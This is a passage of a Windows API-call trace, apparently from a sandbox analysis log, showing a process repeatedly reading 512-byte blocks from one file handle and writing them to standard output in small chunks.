(hFile=0x50) returned 0x1 [0128.207] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.207] WriteFile (in: hFile=0x50, lpBuffer=0x24ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed7c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.207] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.207] GetFileType (hFile=0x50) returned 0x1 [0128.207] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.207] WriteFile (in: hFile=0x50, lpBuffer=0x24edcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24edcc*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.207] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.207] GetFileType (hFile=0x50) returned 0x1 [0128.207] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.207] WriteFile (in: hFile=0x50, lpBuffer=0x24ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ee1c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.207] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.207] GetFileType (hFile=0x50) returned 0x1 [0128.207] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.207] WriteFile (in: hFile=0x50, lpBuffer=0x24ee6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ee6c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.207] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.207] GetFileType (hFile=0x50) returned 0x1 [0128.207] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.207] WriteFile (in: hFile=0x50, lpBuffer=0x24eebc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24eebc*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.207] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.207] GetFileType (hFile=0x50) returned 0x1 [0128.207] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0128.208] WriteFile (in: hFile=0x50, lpBuffer=0x24ef0c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ef0c*, lpNumberOfBytesWritten=0x24df10*=0x20, lpOverlapped=0x0) returned 1 [0128.208] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.208] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24defc | out: lpNewFilePointer=0x0) returned 1 [0128.208] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.208] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.208] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.208] GetFileType (hFile=0x50) returned 0x1 [0128.208] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.208] GetFileType (hFile=0x50) returned 0x1 [0128.208] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.208] WriteFile (in: hFile=0x50, lpBuffer=0x24ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.208] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.208] GetFileType (hFile=0x50) returned 0x1 [0128.208] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.208] WriteFile (in: hFile=0x50, lpBuffer=0x24ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed7c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.208] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.208] GetFileType (hFile=0x50) returned 0x1 [0128.208] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.208] WriteFile (in: hFile=0x50, lpBuffer=0x24edcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24edcc*, 
lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.208] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.208] GetFileType (hFile=0x50) returned 0x1 [0128.208] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.208] WriteFile (in: hFile=0x50, lpBuffer=0x24ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ee1c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.208] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.209] GetFileType (hFile=0x50) returned 0x1 [0128.209] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.209] WriteFile (in: hFile=0x50, lpBuffer=0x24ee6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ee6c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.209] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.209] GetFileType (hFile=0x50) returned 0x1 [0128.209] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.209] WriteFile (in: hFile=0x50, lpBuffer=0x24eebc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24eebc*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.209] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.209] GetFileType (hFile=0x50) returned 0x1 [0128.209] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.209] WriteFile (in: hFile=0x50, lpBuffer=0x24ef0c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ef0c*, lpNumberOfBytesWritten=0x24df10*=0x20, lpOverlapped=0x0) returned 1 [0128.209] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.209] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24defc | out: lpNewFilePointer=0x0) returned 1 [0128.209] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.209] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.209] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.209] GetFileType (hFile=0x50) returned 0x1 [0128.209] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.209] GetFileType (hFile=0x50) returned 0x1 [0128.209] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.209] WriteFile (in: hFile=0x50, lpBuffer=0x24ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.209] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.209] GetFileType (hFile=0x50) returned 0x1 [0128.209] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.209] WriteFile (in: hFile=0x50, lpBuffer=0x24ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed7c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.210] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.210] GetFileType (hFile=0x50) returned 0x1 [0128.210] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.210] WriteFile (in: hFile=0x50, lpBuffer=0x24edcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24edcc*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.210] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.210] GetFileType (hFile=0x50) returned 0x1 [0128.210] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.210] WriteFile (in: hFile=0x50, lpBuffer=0x24ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ee1c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.210] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.210] GetFileType (hFile=0x50) returned 0x1 [0128.210] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.210] WriteFile (in: 
hFile=0x50, lpBuffer=0x24ee6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ee6c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.210] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.210] GetFileType (hFile=0x50) returned 0x1 [0128.210] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.210] WriteFile (in: hFile=0x50, lpBuffer=0x24eebc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24eebc*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.210] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.210] GetFileType (hFile=0x50) returned 0x1 [0128.210] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.210] WriteFile (in: hFile=0x50, lpBuffer=0x24ef0c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ef0c*, lpNumberOfBytesWritten=0x24df10*=0x20, lpOverlapped=0x0) returned 1 [0128.210] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.210] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24defc | out: lpNewFilePointer=0x0) returned 1 [0128.211] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.211] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.211] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.211] GetFileType (hFile=0x50) returned 0x1 [0128.211] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.211] GetFileType (hFile=0x50) returned 0x1 [0128.211] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.211] WriteFile (in: hFile=0x50, lpBuffer=0x24ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.211] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0128.211] GetFileType (hFile=0x50) returned 0x1 [0128.211] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.211] WriteFile (in: hFile=0x50, lpBuffer=0x24ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed7c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.211] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.211] GetFileType (hFile=0x50) returned 0x1 [0128.211] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.211] WriteFile (in: hFile=0x50, lpBuffer=0x24edcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24edcc*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.211] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.211] GetFileType (hFile=0x50) returned 0x1 [0128.211] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.211] WriteFile (in: hFile=0x50, lpBuffer=0x24ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ee1c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.211] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.211] GetFileType (hFile=0x50) returned 0x1 [0128.211] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.211] WriteFile (in: hFile=0x50, lpBuffer=0x24ee6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ee6c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.212] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.212] GetFileType (hFile=0x50) returned 0x1 [0128.212] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.212] WriteFile (in: hFile=0x50, lpBuffer=0x24eebc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24eebc*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.212] _get_osfhandle (_FileHandle=1) returned 0x50 
[0128.212] GetFileType (hFile=0x50) returned 0x1 [0128.212] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.212] WriteFile (in: hFile=0x50, lpBuffer=0x24ef0c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ef0c*, lpNumberOfBytesWritten=0x24df10*=0x20, lpOverlapped=0x0) returned 1 [0128.212] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.212] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24defc | out: lpNewFilePointer=0x0) returned 1 [0128.212] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.212] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.212] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.212] GetFileType (hFile=0x50) returned 0x1 [0128.212] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.212] GetFileType (hFile=0x50) returned 0x1 [0128.212] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.212] WriteFile (in: hFile=0x50, lpBuffer=0x24ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.212] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.212] GetFileType (hFile=0x50) returned 0x1 [0128.212] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.212] WriteFile (in: hFile=0x50, lpBuffer=0x24ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed7c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.212] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.212] GetFileType (hFile=0x50) returned 0x1 [0128.213] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.213] WriteFile (in: hFile=0x50, lpBuffer=0x24edcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, 
lpOverlapped=0x0 | out: lpBuffer=0x24edcc*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.213] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.213] GetFileType (hFile=0x50) returned 0x1 [0128.213] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.213] WriteFile (in: hFile=0x50, lpBuffer=0x24ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ee1c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.213] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.213] GetFileType (hFile=0x50) returned 0x1 [0128.213] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.213] WriteFile (in: hFile=0x50, lpBuffer=0x24ee6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ee6c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.213] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.213] GetFileType (hFile=0x50) returned 0x1 [0128.213] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.213] WriteFile (in: hFile=0x50, lpBuffer=0x24eebc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24eebc*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.213] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.213] GetFileType (hFile=0x50) returned 0x1 [0128.213] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.213] WriteFile (in: hFile=0x50, lpBuffer=0x24ef0c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ef0c*, lpNumberOfBytesWritten=0x24df10*=0x20, lpOverlapped=0x0) returned 1 [0128.213] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.213] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24defc | out: lpNewFilePointer=0x0) returned 1 [0128.213] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.213] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.213] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.214] GetFileType (hFile=0x50) returned 0x1 [0128.214] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.214] GetFileType (hFile=0x50) returned 0x1 [0128.214] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.214] WriteFile (in: hFile=0x50, lpBuffer=0x24ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.214] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.214] GetFileType (hFile=0x50) returned 0x1 [0128.214] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.214] WriteFile (in: hFile=0x50, lpBuffer=0x24ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed7c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.214] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.214] GetFileType (hFile=0x50) returned 0x1 [0128.214] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.214] WriteFile (in: hFile=0x50, lpBuffer=0x24edcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24edcc*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.214] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.214] GetFileType (hFile=0x50) returned 0x1 [0128.214] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.214] WriteFile (in: hFile=0x50, lpBuffer=0x24ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ee1c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.214] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.214] GetFileType (hFile=0x50) returned 0x1 [0128.214] _get_osfhandle (_FileHandle=1) returned 
0x50 [0128.214] WriteFile (in: hFile=0x50, lpBuffer=0x24ee6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ee6c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.214] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.214] GetFileType (hFile=0x50) returned 0x1 [0128.214] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.214] WriteFile (in: hFile=0x50, lpBuffer=0x24eebc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24eebc*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.215] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.215] GetFileType (hFile=0x50) returned 0x1 [0128.215] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.215] WriteFile (in: hFile=0x50, lpBuffer=0x24ef0c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ef0c*, lpNumberOfBytesWritten=0x24df10*=0x20, lpOverlapped=0x0) returned 1 [0128.215] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.215] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24defc | out: lpNewFilePointer=0x0) returned 1 [0128.215] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.215] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.215] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.215] GetFileType (hFile=0x50) returned 0x1 [0128.215] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.215] GetFileType (hFile=0x50) returned 0x1 [0128.215] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.215] WriteFile (in: hFile=0x50, lpBuffer=0x24ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) 
returned 1 [0128.215] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.215] GetFileType (hFile=0x50) returned 0x1 [0128.215] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.215] WriteFile (in: hFile=0x50, lpBuffer=0x24ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed7c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.215] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.215] GetFileType (hFile=0x50) returned 0x1 [0128.215] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.215] WriteFile (in: hFile=0x50, lpBuffer=0x24edcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24edcc*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.215] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.216] GetFileType (hFile=0x50) returned 0x1 [0128.216] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.216] WriteFile (in: hFile=0x50, lpBuffer=0x24ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ee1c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.216] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.216] GetFileType (hFile=0x50) returned 0x1 [0128.216] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.216] WriteFile (in: hFile=0x50, lpBuffer=0x24ee6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ee6c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.216] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.216] GetFileType (hFile=0x50) returned 0x1 [0128.216] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.216] WriteFile (in: hFile=0x50, lpBuffer=0x24eebc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24eebc*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.216] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0128.216] GetFileType (hFile=0x50) returned 0x1 [0128.216] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.216] WriteFile (in: hFile=0x50, lpBuffer=0x24ef0c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ef0c*, lpNumberOfBytesWritten=0x24df10*=0x20, lpOverlapped=0x0) returned 1 [0128.216] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.216] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24defc | out: lpNewFilePointer=0x0) returned 1 [0128.216] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.216] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.216] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.216] GetFileType (hFile=0x50) returned 0x1 [0128.216] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.216] GetFileType (hFile=0x50) returned 0x1 [0128.217] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.217] WriteFile (in: hFile=0x50, lpBuffer=0x24ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.217] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.217] GetFileType (hFile=0x50) returned 0x1 [0128.217] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.217] WriteFile (in: hFile=0x50, lpBuffer=0x24ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed7c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.217] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.217] GetFileType (hFile=0x50) returned 0x1 [0128.217] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.217] WriteFile (in: hFile=0x50, lpBuffer=0x24edcc*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24edcc*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.217] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.217] GetFileType (hFile=0x50) returned 0x1 [0128.217] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.217] WriteFile (in: hFile=0x50, lpBuffer=0x24ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ee1c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.217] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.217] GetFileType (hFile=0x50) returned 0x1 [0128.217] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.217] WriteFile (in: hFile=0x50, lpBuffer=0x24ee6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: 